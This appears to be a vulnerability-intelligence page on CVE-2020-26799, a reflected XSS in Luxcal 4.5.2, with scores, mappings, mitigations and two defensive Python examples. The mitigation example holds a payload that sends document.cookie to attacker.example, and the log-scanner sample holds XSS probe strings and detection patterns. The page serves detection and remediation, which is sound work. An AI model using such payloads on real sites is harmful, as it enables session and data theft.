Cyber Resilience

CVE-2020-26799

Severity: Critical
Published: 21 July 2025
Modified: 15 April 2026
KEV Added: not listed
CVSS Score v3.1: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EPSS Score: 0.0081 (74.6th percentile)
Risk Priority: 20 (weighting: 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2020-26799 is a critical-severity reflected Cross-site Scripting (CWE-79) vulnerability in index.php of Luxcal 4.5.2. The vendor and product are inferred from the references, since NVD filed no CPE for this CVE. Its CVSS v3.1 base score is 9.8 (Critical).

Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE ranks in the top 25.4% of CVEs by exploit likelihood (EPSS 0.0081, 74.6th percentile) and is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Deeper analysis

CVE-2020-26799 is a reflected cross-site scripting (XSS) vulnerability, classified under CWE-79, affecting the index.php file in Luxcal version 4.5.2. Published on 2025-07-21, it carries a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), marking it as critical due to its potential for high impacts on confidentiality, integrity, and availability.

As scored, the vulnerability is remotely exploitable by an unauthenticated attacker with low attack complexity. Successful exploitation lets the attacker inject script that the affected endpoint reflects into its response, so the script runs in other users' browsers and can exfiltrate their data (for example session cookies). When triaging, keep in mind that a reflected payload still has to be delivered to a victim, typically as a crafted link to index.php, so the UI:N component of the vector should be read as a scoring choice rather than as a description of the attack path.

Further detail is available in the references: the vulnerability disclosure at https://suryadina.com/luxcal-reflected-xss-cve-2020-26799/, the Luxcal download page at https://www.luxsoft.eu/index.php?pge=dload, and a demonstration video at https://youtu.be/npw9jcQ1h1U.


Vulnerability details

A reflected cross-site scripting (XSS) vulnerability was discovered in index.php on Luxcal 4.5.2 which allows an unauthenticated attacker to steal other users' data.

CWE(s)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Related Threats

MITRE ATT&CK Enterprise Techniques

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
Why these techniques?

Reflected XSS in a public-facing web application (index.php) directly enables remote exploitation of the application without authentication, and the vector is scored as requiring no user interaction.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1
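For the detection side of T1190, the following added example (written for this page, not code from the advisory or from the Luxcal project) scans web server access-log lines for reflected-XSS probes against a PHP endpoint. The log lines are constructed for the example, the parameter name `q` is a placeholder (the page does not name the vulnerable parameter), and the decoder handles double-percent-encoding, a common evasion that a single `unquote` would miss.

```python
import re
from typing import Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Common-log-format parser; the request line is split into method, target and protocol.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Markers that indicate script injection once a value is fully decoded.
XSS_MARKERS = re.compile(
    r"<\s*script\b|javascript\s*:|\bon[a-z]+\s*=|<\s*(?:img|svg|iframe)\b", re.I
)

# Constructed sample log for this example; not taken from the advisory, the
# demonstration video, or any real Luxcal deployment. Parameter "q" is assumed.
SAMPLE_LOG = """\
203.0.113.10 - - [21/Jul/2025:10:01:02 +0000] "GET /index.php?pge=dload HTTP/1.1" 200 5123
203.0.113.10 - - [21/Jul/2025:10:01:09 +0000] "GET /index.php?q=meeting%20notes HTTP/1.1" 200 4410
198.51.100.7 - - [21/Jul/2025:10:02:31 +0000] "GET /index.php?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 4502
198.51.100.7 - - [21/Jul/2025:10:02:40 +0000] "GET /index.php?q=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 4498
192.0.2.44 - - [21/Jul/2025:10:03:00 +0000] "POST /index.php HTTP/1.1" 302 0
"""


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded payloads are not missed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line: str) -> Optional[dict]:
    """Return a finding for a request whose query carries an XSS marker, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl decodes one layer; decode_fully strips any further layers.
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = decode_fully(raw)
        if XSS_MARKERS.search(value):
            return {
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "path": parts.path,
                "param": name,
                "payload": value,
                "status": int(m.group("status")),
            }
    return None


def scan_log(text: str) -> list:
    """Scan every line and collect the findings in log order."""
    return [f for f in (scan_line(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 200 response to a probe is not proof that the script executed, only that the request reached the endpoint; pair this with the reflected value in the response body or with a WAF log to confirm. The bounded decode loop matters: unbounded decoding is itself a denial-of-service vector against the detector.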

CVEs Like This One

CVE-2021-47873 (shared CWE-79)
CVE-2026-7052 (shared CWE-79)
CVE-2024-56060 (shared CWE-79)
CVE-2025-49043 (shared CWE-79)
CVE-2026-40038 (shared CWE-79)
CVE-2024-56022 (shared CWE-79)
CVE-2025-68889 (shared CWE-79)
CVE-2026-1074 (shared CWE-79)
CVE-2025-22539 (shared CWE-79)
CVE-2025-22286 (shared CWE-79)

Affected Assets

Luxcal 4.5.2 (index.php)
Inferred from the references and description; NVD did not file a CPE for this CVE. Note that suryadina.com is the researcher's disclosure site, not the affected product.

Mitigating Controls

Mitigating Controls (NIST 800-53 r5)

prevent (flaw remediation; control identifier not given)

Directly mitigates the specific reflected XSS flaw in Luxcal 4.5.2 index.php by requiring timely identification, reporting, and patching of the vulnerability.

prevent (SI-15 Information Output Filtering)

Prevents execution of reflected malicious scripts by filtering and encoding the information output by the vulnerable index.php endpoint.

prevent (SI-10 Information Input Validation)

Blocks injection of malicious scripts by validating all user input to the index.php file before it is processed.
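To make the two controls concrete, here is an added example (written for this page; it is not Luxcal's code, and the page does not name the vulnerable parameter, so `q`, the search-box framing and the attacker payload are assumptions). It models the CWE-79 pattern the advisory describes, then the SI-15 fix (HTML-encode at the point of output, which is the control that actually removes the bug) and the SI-10 layer (allow-list validation), with a Content-Security-Policy header as defence in depth.

```python
import html
import re
from typing import Tuple
from urllib.parse import parse_qs, quote

# Constructed payload and hypothetical parameter name "q": assumptions for illustration.
PAYLOAD = "<script>document.location='https://attacker.example/c?'+document.cookie</script>"
ATTACK_QUERY = "q=" + quote(PAYLOAD, safe="")
BENIGN_QUERY = "q=" + quote("meeting notes", safe="")


def get_param(query_string: str, name: str) -> str:
    """Fetch one query parameter, the way a PHP $_GET lookup would."""
    return parse_qs(query_string, keep_blank_values=True).get(name, [""])[0]


def render_vulnerable(query_string: str) -> str:
    """CWE-79: the raw parameter is interpolated into HTML, so script inside it runs."""
    return f"<html><body><p>Search: {get_param(query_string, 'q')}</p></body></html>"


def render_escaped(query_string: str) -> str:
    """SI-15 output filtering: HTML-encode at the point of output. This alone closes the hole."""
    safe = html.escape(get_param(query_string, "q"), quote=True)
    return f"<html><body><p>Search: {safe}</p></body></html>"


def validate_search_term(value: str, max_len: int = 64) -> str:
    """SI-10 input validation: allow-list the characters a search term may contain."""
    if len(value) > max_len or not re.fullmatch(r"[\w .,-]*", value):
        raise ValueError("invalid search term")
    return value


def render_hardened(query_string: str) -> Tuple[dict, str]:
    """Both controls plus defence-in-depth headers; returns (headers, body)."""
    try:
        term = validate_search_term(get_param(query_string, "q"))
    except ValueError:
        term = ""  # rejected input is never echoed back, not even encoded
    body = f"<html><body><p>Search: {html.escape(term, quote=True)}</p></body></html>"
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        # CSP without 'unsafe-inline' stops inline script even if an encoding bug slips through.
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
        "X-Content-Type-Options": "nosniff",
    }
    return headers, body


def contains_live_script(page: str) -> bool:
    """Crude check: is there an un-encoded <script tag in the response body?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(ATTACK_QUERY))
    print("escaped:   ", render_escaped(ATTACK_QUERY))
    print("hardened:  ", render_hardened(ATTACK_QUERY)[1])
```

Validation is the weaker of the two controls on its own: a field that must legitimately accept `<`, `&` or quotes cannot be allow-listed this tightly, and a list that is too loose lets a payload through. Output encoding for the context the value lands in (HTML body here; attribute, JavaScript and URL contexts each need their own encoder) is what makes reflected XSS impossible, and validation plus CSP reduce the blast radius when an encoder is missed.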

References

Vulnerability disclosure: https://suryadina.com/luxcal-reflected-xss-cve-2020-26799/
Luxcal download page: https://www.luxsoft.eu/index.php?pge=dload
Demonstration video: https://youtu.be/npw9jcQ1h1U